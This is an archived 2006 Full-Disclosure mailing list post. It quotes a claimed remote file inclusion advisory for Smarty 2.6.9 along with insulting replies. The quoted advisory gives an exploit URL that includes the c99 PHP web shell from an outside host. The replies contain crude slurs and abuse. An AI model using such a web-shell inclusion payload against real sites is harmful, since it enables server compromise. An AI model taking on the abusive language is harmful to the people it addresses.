| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 20 Oct 2006 03:12:17 -0500
From: <daylasoul@...h.com>
To: <full-disclosure@...ts.grok.org.uk>
Cc:
Subject: Re: Vuln
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Sun, 15 Oct 2006 14:19:08 -0500 Pink Hat
<pinkhat.h4x0r@...il.com> wrote:
>I didn't know those were mutually exclusive. Thats like asking
>your
>mom is she is a slut or a whore. Aren't they one and the same?
>
>On 10/15/06, upb <upbupb@...il.com> wrote:
>>
>> are you fucking stupid or just retarded?
>>
>>
>> On 10/14/06, hitham hitham <sp1der_net@...mail.com> wrote:
>> >
>> > Hi I find a new vuln ...
>> >
>> > the vuln :-
>> >
>> > #########################################################
>> >
>> > # Auother :- Sp1deR_NeT
>> >
>> > # E-mail :- Sp1deR_Net@...mail.Com
>> >
>> > # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
>> >
>> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
>> >
>> > #########################################################
>> >
>> > Script :- Smarty-2.6.9
>> >
>> > Exploit :- libs/Smarty.class.php?filename=
>www.soqor.net/tools/c99.txt?
>> >
>> > Example :-
>> >
>>
>www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.ne
>t/tools/c99.txt
>> ?
>> >
>> > Vuln Code :-
>> > /**
>> > * wrapper for include() retaining $this
>> > * @return mixed
>> > */
>> > function _include($filename, $once=false, $params=null)
>> > {
>> > if ($once) {
>> > return include_once($filename);
>> > } else {
>> > return include($filename);
>> > }
>> > }
>> > ---------------------------------------------
>> >
>> > Thx To :-
>nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
>> >
>> > ---------------------------------------------
>> >
>> > WwW.Sp1deR-N3T.Com ///\\\///\\\
>> >
>> > =============Sp1deR_Net@...mail.Com==============
>> >
>> > !@!@!@!@!@!
>> >
>> >
>>
>_________________________________________________________________
>> > Windows Liveā¢ Messenger has arrived. Click here to download it
>for free!
>> > http://imagine-msn.com/messenger/launch80/?locale=en-gb
>> >
>> >
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>> >
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5
wpwEAQECAAYFAkU4hOEACgkQ3AEcWsxdEQ7OMAP+OFcUTRO2LF0UVWl1YdKpTaMnrsTG
1ML9rZcc276Q9nzsVV3O4SPTd2KExuToLUp1YU16DxtmV5Nk7wbd4yqcOEa996bWWTq8
Kc/oK04GJgGoLX9BqGvXkuLXEjZFfTaZegbshjUUJjH/kGEYFdutIlHlkqtL2uNUjMW/
P69GcKk=
=F3kH
-----END PGP SIGNATURE-----
Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists